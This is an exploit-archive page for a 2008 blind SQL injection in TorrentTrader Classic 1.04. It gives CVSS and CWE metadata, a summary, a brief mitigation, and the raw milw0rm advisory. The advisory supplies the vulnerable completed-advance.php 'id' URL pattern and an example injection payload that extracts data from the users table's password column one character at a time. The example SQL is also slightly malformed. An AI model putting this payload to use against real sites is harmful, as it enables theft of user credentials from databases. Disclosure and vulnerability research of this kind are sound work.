header-logo
Suggest Exploit
vendor:
TorrentTrader Classic
by:
BazOka-HaCkEr
7.5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: TorrentTrader Classic
Affected Version From: 01.04
Affected Version To: 01.04
Patch Exists: YES
Related CWE: N/A
CPE: a:torrenttrader:torrenttrader_classic
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

TorrentTrader Classic <= 1.04 Blind SQL Injection Exploit

A Blind SQL Injection vulnerability exists in TorrentTrader Classic version 1.04. An attacker can exploit this vulnerability to gain access to sensitive information stored in the database. The vulnerability is due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'completed-advance.php' script. An attacker can exploit this vulnerability by sending a specially crafted SQL query to the vulnerable script. This can allow the attacker to gain access to sensitive information stored in the database.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

======================================================
 
==> TorrentTrader Classic <= 1.04 Blind SQL Injection Exploit
 
======================================================
 
==> NamE      : TorrentTrader Classic
 
==> version    : 1.04
 
==> Download : www.torrenttrader.org
 
======================================================
 
==> AuThOr : BazOka-HaCkEr
 
==> EmaiL   : x9j@HoTmaiL.Com
 
==> HomE   : WwW.TrYaG.cc/cc
 
======================================================
 
==> ExplO!te :
 
==> www.TarGeT.com/paTh/completed-advance.php?id=[SQL]
 
==> ExampLe :
 
==> www.TarGeT.com/tracker/completed-advance.php?id=180+AND ascii(SUBSTRING((SELECT Count(password) FROM users LIMIT 1,1)1,1)
 
======================================================
 
==> GreeTz :
 
==> ll Abu-Mahdi ll FeezO ll Mr.SQL ll MoGaTiL ll Abo-Najm ll alra7el ll
 
======================================================

# milw0rm.com [2008-10-07]